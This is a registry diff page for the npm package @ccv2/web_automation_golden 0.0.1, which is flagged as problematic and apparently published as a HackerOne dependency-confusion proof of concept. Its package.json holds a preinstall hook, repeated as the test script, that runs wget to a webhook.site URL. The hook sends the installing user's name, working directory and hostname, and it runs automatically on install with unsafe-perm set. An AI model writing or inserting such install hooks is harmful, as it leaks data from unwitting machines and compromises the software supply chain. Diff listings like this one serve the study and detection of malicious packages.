@ccv2/web_automation_golden 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @ccv2/web_automation_golden might be problematic. Click here for more details.

@@ -0,0 +1 @@
1
+ This URL has no default content configured. <a href="https://webhook.site/#!/view/e9331a68-a3d2-44c9-b896-7fa4a5c3d3ad">View in Webhook.site</a>.
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("PoC Rektile404");
3
+ }
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "@ccv2/web_automation_golden",
3
+ "version": "0.0.1",
4
+ "description": "PoC for hackerone",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "wget --quiet \"https://webhook.site/e9331a68-a3d2-44c9-b896-7fa4a5c3d3ad/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"",
8
+ "preinstall":"wget --quiet \"https://webhook.site/e9331a68-a3d2-44c9-b896-7fa4a5c3d3ad/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\""
9
+ },
10
+ "config": {
11
+ "unsafe-perm":true
12
+ },
13
+ "author": "Rektile404",
14
+ "license": "ISC"
15
+ }